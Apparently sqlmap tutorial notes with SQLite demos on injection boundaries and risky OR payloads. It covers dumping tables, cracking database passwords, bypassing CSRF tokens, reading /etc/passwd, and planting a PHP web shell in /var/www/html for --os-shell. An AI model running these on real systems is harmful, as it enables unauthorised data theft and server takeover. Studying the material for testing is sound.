sqlmap
// sqlmap tips
Display Errors
The first step is usually to switch on --parse-errors, which parses the DBMS
errors (if any) and displays them as part of the program run.
// The -t option stores the whole traffic content to an output file:
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
// Another useful flag is the -v option, which raises the verbosity level of
the console output:
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
// -v 6 is the maximum verbosity: it prints all errors, the injection payloads
// and the full HTTP requests and responses (headers and body) to the terminal,
// so that we can follow along with everything SQLMap is doing in real time.
// Finally, we can utilize the --proxy option to route the whole traffic through
// a (MiTM) proxy (e.g., Burp), so that we can later manually investigate all
// requests, repeat them, and utilize all features of Burp with these requests.
// Boundaries (e.g. '<vector>-- -): the prefix and suffix wrapped around the
// vector so that it lands syntactically inside the vulnerable SQL statement.
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
// This will result in an enclosure of all vector values between the
// static prefix %')) and the suffix -- -.
// The vulnerable statement these boundaries fit (user input concatenated unescaped):
$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);
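The following script is an added example (not part of the original page and not sqlmap's own code). It assembles the injected value the way the application above concatenates it (prefix, a space, the vector, then the suffix) and runs the result against an in-memory SQLite database standing in for MySQL; the users table, its rows and the UNION vector are constructed for the demo. It shows why the boundary matters: with a plain single-quote prefix the two parentheses are never closed and the DBMS rejects the statement (so sqlmap would see no injection), while --prefix="%'))" --suffix="-- -" produces a valid statement whose UNION row comes back.

```python
# Added example: how sqlmap's --prefix/--suffix boundaries wrap a vector so that the
# resulting SQL stays syntactically valid. SQLite is used as a stand-in for MySQL;
# the schema, rows and vector below are constructed for the demo.
import sqlite3

# The vulnerable statement from the PHP snippet above, with the user-controlled
# value concatenated in exactly the way the application does it.
TEMPLATE = "SELECT id,name,surname FROM users WHERE id LIKE (('{q}')) LIMIT 0,1"


def build_query(vector, prefix="", suffix=""):
    """Mimic sqlmap: the sent value is <prefix> <vector><suffix>, dropped into the
    statement untouched (no quoting, no escaping)."""
    return TEMPLATE.format(q=prefix + " " + vector + suffix)


def run(conn, vector, prefix="", suffix=""):
    """Execute the assembled statement; return its rows, or the DB error string."""
    sql = build_query(vector, prefix, suffix)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "alice", "smith"), (2, "bob", "jones")])  # constructed rows
    return conn


def demo():
    """Return (naive, tuned): the outcome of the same UNION vector with a plain
    single-quote boundary and with the %')) / -- - boundary."""
    conn = make_db()
    vector = "UNION ALL SELECT 'x',sqlite_version(),'y'"
    # Plain single quote: the string is closed but the two parentheses are not,
    # so the DBMS answers with a syntax error and the vector never executes.
    naive = run(conn, vector, prefix="'", suffix="-- -")
    # %')) closes the string and both parentheses, -- - comments out the trailing
    # ')) LIMIT 0,1', and the UNION appends our row to the legitimate result.
    tuned = run(conn, vector, prefix="%'))", suffix="-- -")
    return naive, tuned


if __name__ == "__main__":
    print(build_query("UNION ALL SELECT 'x',sqlite_version(),'y'", "%'))", "-- -"))
    naive, tuned = demo()
    print("naive:", naive)
    print("tuned:", tuned)
```

The space between prefix and vector is what sqlmap inserts for non-stacked techniques; the suffix is appended directly. The MySQL comment `-- -` (with the trailing space MySQL requires after `--`) also works in SQLite, which is why the stand-in is faithful here.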
//
The option --level (1-5, default 1) extends both vectors and boundaries being used,
based on their expectancy of success (i.e., the lower the expectancy,
the higher the level).
The option --risk (1-3, default 1) extends the used vector set based on their risk
of causing problems at the target side (i.e., risk of database entry loss or
denial-of-service).
sqlmap -u www.example.com/?id=1 -v 3 --level=5
// As for the number of payloads, by default (i.e. --level=1 --risk=1) the number of
// payloads used for testing a single parameter goes up to 72, while in the most
// detailed case (--level=5 --risk=3) it increases to 7,865.
As SQLMap is already tuned to check for the most common boundaries and vectors,
regular users are advised not to touch these options, because raising them makes
the whole detection process considerably slower. Nevertheless, in special cases
of SQLi vulnerabilities where usage of OR payloads is a must (e.g., login pages,
where the original condition is false on its own, so an AND-based payload can
never produce an observable TRUE/FALSE difference), we have to raise the risk
level ourselves (OR-based tests are only enabled at --risk=3). OR payloads are
kept out of a default run because they are inherently dangerous: if the
vulnerable statement is one that modifies data (e.g. DELETE or UPDATE, less
common but it happens), an always-true OR condition makes the statement apply
to every row of the table.
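To make both halves of that argument concrete, here is an added example (not part of the original page and not sqlmap's own code). It sends the AND-based boolean probes (risk 1) and the OR-based ones (risk 3) through two constructed statements on an in-memory SQLite database: a login SELECT whose original condition is false, and a logout DELETE built with the same concatenation. The users and sessions tables, their rows and the probe strings are all made up for the demo.

```python
# Added example: why OR-based vectors are needed on a login form and why sqlmap keeps
# them behind --risk=3. SQLite stands in for the real DBMS; tables, rows and probes
# are constructed for the demo.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])  # constructed rows
    conn.execute("CREATE TABLE sessions (token TEXT)")
    conn.executemany("INSERT INTO sessions VALUES (?)",
                     [("t1",), ("t2",), ("t3",)])  # constructed rows
    return conn


def login_rows(conn, username):
    """Vulnerable login check: the username is concatenated into the WHERE clause.
    The attacker knows neither a valid username nor a password, so the original
    condition is false on its own. Returns the number of matching rows."""
    sql = "SELECT name FROM users WHERE name='%s' AND pass='guess'" % username
    return len(conn.execute(sql).fetchall())


def delete_rows(conn, token):
    """Vulnerable logout: the same concatenation inside a DELETE. Returns how many
    rows the statement removed."""
    sql = "DELETE FROM sessions WHERE token='%s'" % token
    return conn.execute(sql).rowcount


def demo():
    """Run the AND-based (risk 1) and OR-based (risk 3) boolean probes through both
    statements and collect the observable effect of each."""
    results = {}
    # Login page: boolean-blind detection needs a visible difference between the
    # TRUE and the FALSE probe. name='nosuch' AND 1=1 is still false, so the AND
    # pair returns 0 rows both times and sqlmap sees no injection.
    conn = make_db()
    results["login_and_true"] = login_rows(conn, "nosuch' AND 1=1-- -")
    results["login_and_false"] = login_rows(conn, "nosuch' AND 1=2-- -")
    # name='nosuch' OR 1=1 is true for every user: the page "logs in" on the TRUE
    # probe and not on the FALSE one, which is the difference sqlmap needs.
    results["login_or_true"] = login_rows(conn, "nosuch' OR 1=1-- -")
    results["login_or_false"] = login_rows(conn, "nosuch' OR 1=2-- -")
    # The same vectors inside a DELETE: the AND probe touches nothing, the OR probe
    # makes the WHERE clause true for every row and empties the table.
    results["delete_and"] = delete_rows(make_db(), "nosuch' AND 1=1-- -")
    results["delete_or"] = delete_rows(make_db(), "nosuch' OR 1=1-- -")
    return results


if __name__ == "__main__":
    for probe, effect in demo().items():
        print("%-16s -> %d row(s)" % (probe, effect))
```

The login half is the reason to raise --risk on a login form; the DELETE half is the reason sqlmap does not do it for you: the same OR vector that makes detection possible wipes every session the moment the injection point sits in a data-modifying statement.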
Techniques
// B: boolean-based blind, E: error-based, U: UNION query, S: stacked queries,
// T: time-based blind, Q: inline queries (default is all of them: BEUSTQ)
--technique=BEU
Enumeration usually starts with the retrieval of the basic information:
Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights (switch --is-dba)
// narrow down a dump to rows 2-3 of testdb.users
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
// search table names (tables LIKE 'user')
sqlmap -u "http://www.example.com/?id=1" --search -T user
// search column names
sqlmap -u "http://www.example.com/?id=1" --search -C pass
// DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
//CSRF
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
// unique value bypass: send a fresh random value for rp on every request
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
// calculated parameter bypass: recompute h = md5(id) with --eval before every request
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
// proxy
--proxy="socks4://177.39.187.70:33283"
// check if DBA (file read/write and --os-shell below usually need DBA-level privileges)
sqlmap -u "http://www.example.com/?id=1" --is-dba
// reading local files
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
// write file (on MySQL this needs the FILE privilege and a directory allowed by secure_file_priv)
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
sqlmap -u "http://www.example.com/?id=1" --os-shell